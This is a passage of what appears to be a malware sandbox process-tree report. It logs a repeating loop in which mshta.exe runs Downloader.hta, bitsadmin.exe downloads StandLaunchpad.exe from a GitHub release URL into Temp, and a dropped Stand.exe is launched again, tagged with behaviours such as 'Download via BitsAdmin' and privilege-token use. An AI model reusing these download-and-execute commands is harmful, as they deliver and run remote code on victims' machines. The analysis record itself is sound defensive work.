        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        77⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        77⤵
        
        PID:276
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        78⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1572
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        78⤵
        Modifies Internet Explorer settings
        
        PID:2380
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        79⤵
        Download via BitsAdmin
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        79⤵
        
        PID:528
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        80⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        80⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        81⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        81⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        82⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        82⤵
        Modifies Internet Explorer settings
        
        PID:2284
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        83⤵
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        83⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        84⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        84⤵
        Modifies Internet Explorer settings
        
        PID:2528
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        85⤵
        Download via BitsAdmin
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        85⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        86⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        86⤵
        Modifies Internet Explorer settings
        
        PID:1384
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        87⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        87⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        88⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        88⤵
        Modifies Internet Explorer settings
        
        PID:940
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        89⤵
        Download via BitsAdmin
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        89⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        90⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        90⤵
        Modifies Internet Explorer settings
        
        PID:1004
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        91⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        91⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        92⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        92⤵
        Modifies Internet Explorer settings
        
        PID:2100
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        93⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        93⤵
        
        PID:1016
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        94⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1716
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        94⤵
        Modifies Internet Explorer settings
        
        PID:1204
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        95⤵
        Download via BitsAdmin
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        95⤵
        
        PID:1252
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        96⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        96⤵
        Modifies Internet Explorer settings
        
        PID:2028
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        97⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        97⤵
        
        PID:1384
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        98⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        98⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        99⤵
        
        PID:2576
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        99⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        100⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        100⤵
        Modifies Internet Explorer settings
        
        PID:2120
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        101⤵
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        101⤵
        
        PID:1944
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        102⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        102⤵
        Modifies Internet Explorer settings
        
        PID:1668
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        103⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        103⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        104⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        104⤵
        Modifies Internet Explorer settings
        
        PID:1424
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        105⤵
        Download via BitsAdmin
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        105⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        106⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        106⤵
        Modifies Internet Explorer settings
        
        PID:1880
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        107⤵
        Download via BitsAdmin
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        107⤵
        
        PID:1976
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        108⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        108⤵
        Modifies Internet Explorer settings
        
        PID:2744
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        109⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        109⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        110⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:708
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        110⤵
        Modifies Internet Explorer settings
        
        PID:976
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        111⤵
        Download via BitsAdmin
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        111⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        112⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        112⤵
        Modifies Internet Explorer settings
        
        PID:916
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        113⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        113⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        114⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        114⤵
        Modifies Internet Explorer settings
        
        PID:2320
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        115⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        115⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        116⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        116⤵
        Modifies Internet Explorer settings
        
        PID:1556
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        117⤵
        Download via BitsAdmin
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        117⤵
        
        PID:1156
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        118⤵
        Executes dropped EXE
        
        PID:1596
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        118⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        119⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        119⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        120⤵
        Executes dropped EXE
        
        PID:1032
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        120⤵
        Modifies Internet Explorer settings
        
        PID:3028
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        121⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        121⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        122⤵
        Executes dropped EXE
        
        PID:1900
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        122⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        123⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        123⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        124⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        124⤵
        Modifies Internet Explorer settings
        
        PID:2116
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        125⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        125⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        126⤵
        Executes dropped EXE
        
        PID:2232
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        126⤵
        Modifies Internet Explorer settings
        
        PID:640
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        127⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        127⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        128⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        128⤵
        
        PID:816
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        129⤵
        Download via BitsAdmin
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        129⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        130⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        130⤵
        Modifies Internet Explorer settings
        
        PID:1168
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        131⤵
        Download via BitsAdmin
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        131⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        132⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        132⤵
        Modifies Internet Explorer settings
        
        PID:2800
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        133⤵
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        133⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        134⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        134⤵
        Modifies Internet Explorer settings
        
        PID:1516
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        135⤵
        Download via BitsAdmin
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        135⤵
        
        PID:1252
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        136⤵
        
        PID:320
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        136⤵
        Modifies Internet Explorer settings
        
        PID:1348
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        137⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        137⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        138⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        138⤵
        Modifies Internet Explorer settings
        
        PID:2468
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        139⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        139⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        140⤵
        
        PID:568
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        140⤵
        Modifies Internet Explorer settings
        
        PID:1556
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        141⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        141⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        142⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        142⤵
        Modifies Internet Explorer settings
        
        PID:1680
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        143⤵
        Download via BitsAdmin
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        143⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        144⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\mshta.exe
        
